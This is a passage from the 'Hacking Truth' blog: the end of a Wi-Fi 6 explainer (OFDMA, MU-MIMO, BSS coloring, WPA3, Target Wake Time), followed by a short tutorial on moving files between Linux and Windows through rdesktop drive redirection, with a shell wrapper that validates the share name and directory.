    So to meet this demand, engineers developed Wi-Fi 6. What are the differences between Wi-Fi 6 and Wi-Fi 5? One of those differences is obviously speed. The older Wi-Fi 5 had a maximum speed of 3.5 gigabits per second. With Wi-Fi 6 that speed has been increased to 9.6 gigabits per second, which is a significant increase. Keep in mind that this speed is shared across multiple devices; it does not mean that each of your devices will achieve it. Also, this speed applies to your local area network, meaning in your home or office; it does not mean that your internet speed will increase. However, it will make your connection seem faster because of the technology implemented in Wi-Fi 6. One of these technologies is orthogonal frequency-division multiple access, or OFDMA.

     

    Now this technology lowers latency and delivers data to multiple devices more efficiently. For example, let's say that Wi-Fi transmissions act like carts that deliver data to Wi-Fi devices, and that you have three Wi-Fi devices. With the older Wi-Fi 5, a cart would deliver one piece of data to one device at a time.

    So each Wi-Fi device would have to wait its turn to receive data. But with the newer Wi-Fi 6, each cart carries three pieces of data and delivers to each device at the same time. So with Wi-Fi 5 devices have to wait their turn to receive data, but with Wi-Fi 6 they don't have to wait, because they all receive data at the same time. This makes more efficient use of data delivery, which reduces lag.

    Another technology that Wi-Fi 6 uses is MU-MIMO, which stands for multiple-user, multiple-input, multiple-output. This technology first made its debut in Wi-Fi 5 version 2, and what it does is allow multiple wireless devices to communicate with a Wi-Fi router at the same time. Before that, Wi-Fi 5 routers used SU-MIMO, which stands for Single-User MIMO. This also allowed Wi-Fi routers to communicate with multiple devices, but only with one device at a time, so each device had to wait its turn to communicate with the router. With a MU-MIMO router, the connected devices don't have to wait their turn, because it allows communication with multiple devices at the same time.

     




    It breaks up the internet bandwidth into individual streams and pushes them to the connected devices. So with this technology you'll see a significant improvement in the speed of your internet if you're doing things that require a lot of bandwidth, such as streaming videos or downloading. As I stated before, MU-MIMO debuted in Wi-Fi 5 version 2, but it has improved in Wi-Fi 6. The difference is that with Wi-Fi 5 it was only available for download and could only support four simultaneous streams, but with Wi-Fi 6 it's available for both upload and download and can support up to 12 simultaneous streams. Wi-Fi 6 also has an improvement in beamforming. Beamforming is a technique that sends transmissions in a specific direction, which strengthens the signal. Without beamforming, the transmission is sent in every direction, which can weaken the signal; this is what happens in older routers. With newer routers the signal is directed to the devices that are connected to it.

     

    Wi-Fi 6 also has the ability to minimize interference from nearby networks. It does this by using a technology called basic service set (BSS) coloring. For example, when you have two Wi-Fi routers next to each other, such as happens with neighbors, the signals from the two networks can overlap and cause interference with each other. With BSS coloring, Wi-Fi 6 colors or marks the networks so it can distinguish another network from its own. It marks frames from nearby networks so that your router disregards them, which makes your Wi-Fi router more efficient, because the less time a Wi-Fi router gets distracted, the more responsive it can be. As far as security, Wi-Fi 6 has the latest security protocol, which is WPA3. WPA3 provides cutting-edge security features that enable more robust authentication, which increases protection from password guessing attempts.

     

     


     

     

    In order for a device to be Wi-Fi 6 certified it must support WPA3. Wi-Fi 6 can also extend the battery life of Wi-Fi devices, using a technique called Target Wake Time (TWT). With TWT, the router or access point negotiates a schedule with each Wi-Fi device for when data is to be sent or received. The device powers its radio on at the scheduled times and sleeps, with the radio off, in between, which saves battery.

    Wi-Fi routers broadcast on one or more frequency bands that wireless devices connect to. Until now they have been restricted to two bands, 2.4 GHz and 5 GHz. The newer Wi-Fi 6E adds a third band, 6 GHz. The 6 GHz band opens up additional channels for delivering large amounts of data to Wi-Fi devices, especially in crowded environments, which results in better network performance and more capacity to support additional users.

     





    Who would benefit from a Wi-Fi 6 router?

    Well, if you have a lot of wireless devices, perhaps 15 or more, then I would definitely recommend getting one, especially if you have closer to 20 devices, because you will see a big difference in the performance of your network. Keep in mind, though, that to reap the full benefits of Wi-Fi 6 your client devices must also support Wi-Fi 6.

     

    Amazon Netgear wifi 6 router- https://amzn.to/30ymzoX

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.



  • File Transfer From Windows to Linux via rdesktop

     

    File Transfer From Windows to Linux via rdesktop


     



    The rdesktop tool is an open-source RDP client; it lets you open a remote desktop session on a Windows box from the Linux machine you are working from.


    Sometimes it is important to be able to move files between the two machines over that same session, especially when there is no FTP or SMB service available on the target. Fortunately rdesktop supports drive redirection: a local directory is exposed inside the Windows session as a network drive, so files can be copied in either direction.


    Now, when connecting to Windows, we use the following rdesktop arguments:

     


      
    $ rdesktop  172.16.91.100 -r disk:linux=/home/hackerboy/Documents/ine-lab
    
    



     -f : not important for our purpose; it just starts the session in full-screen mode. To enter and leave full-screen mode, press Ctrl+Alt+Enter.
     

     -r : the device redirection option. disk is one of the redirections available; disk:linux=/home/hackerboy/Documents/ine-lab creates a network drive in the Windows session named "linux" that points to /home/hackerboy/Documents/ine-lab on our Linux box. Remember that the server must be Windows XP or newer for this feature, and the share name is limited to 8 characters.


    After connecting with these options, open File Explorer (My Computer / This PC) inside the Windows session via the rdesktop window, as shown below.






    Here you will find a device named "linux on Kumar Atul Jaiswal" (the share name followed by the hostname of your Linux client); that is your /home/hackerboy/Documents/ine-lab folder, reachable from the Windows side as \\tsclient\linux.

    Keep in mind that the redirected directory is readable and writable by anything running in the remote session, with the privileges of your local user. Redirect a dedicated directory rather than your home directory, and treat files that come back from a lab or engagement host as untrusted.

    The -r option of rdesktop supports many other redirections, such as sound, printer and clipboard. Check the manual page for details.
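    The following wrapper is an added example, not code from the original post: it checks the two constraints mentioned above (the 8-character share-name limit and that the directory exists) before building the disk:NAME=PATH redirection and launching rdesktop. The host, share name and path are assumed to be supplied by the operator; only the -f and -r disk: options documented in the rdesktop man page are used.

```shell
#!/bin/sh
# Added example (not part of the original post). Validates and builds the
# rdesktop drive-redirection spec "disk:NAME=PATH" described above.
# Assumptions: rdesktop 1.8+ with the "-r disk:<name>=<path>" syntax from its
# man page; host, share name and directory are chosen by the operator.

# rdesktop_disk_arg NAME PATH
# Prints "disk:NAME=PATH" on success. Fails (non-zero status, message on
# stderr) if NAME is empty, contains characters Windows would reject in a
# share name, exceeds the 8-character limit, or PATH is not a directory.
rdesktop_disk_arg() {
    name=$1
    path=$2
    case "$name" in
        '')
            echo "share name must not be empty" >&2
            return 1 ;;
        *[!A-Za-z0-9_-]*)
            echo "share name '$name' must contain only letters, digits, _ or -" >&2
            return 1 ;;
    esac
    if [ "${#name}" -gt 8 ]; then
        echo "share name '$name' is ${#name} chars; rdesktop limits it to 8" >&2
        return 1
    fi
    if [ ! -d "$path" ]; then
        echo "'$path' is not an existing directory" >&2
        return 1
    fi
    printf '%s\n' "disk:${name}=${path}"
}

# rdesktop_share HOST NAME PATH
# Opens a full-screen session to HOST with PATH redirected as \\tsclient\NAME.
# Point PATH at a dedicated exchange directory, never at your home directory:
# the remote session can read and write it as your local user.
rdesktop_share() {
    host=$1
    spec=$(rdesktop_disk_arg "$2" "$3") || return 1
    rdesktop -f -r "$spec" "$host"
}

# Usage (matches the command in the post):
#   rdesktop_share 172.16.91.100 linux /home/hackerboy/Documents/ine-lab
```

    Running the wrapper with a share name such as "documents" (nine characters) stops before rdesktop is launched, which is easier to diagnose than a drive that silently never appears in the Windows session.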







      - Hacking Truth by Kumar Atul Jaiswal
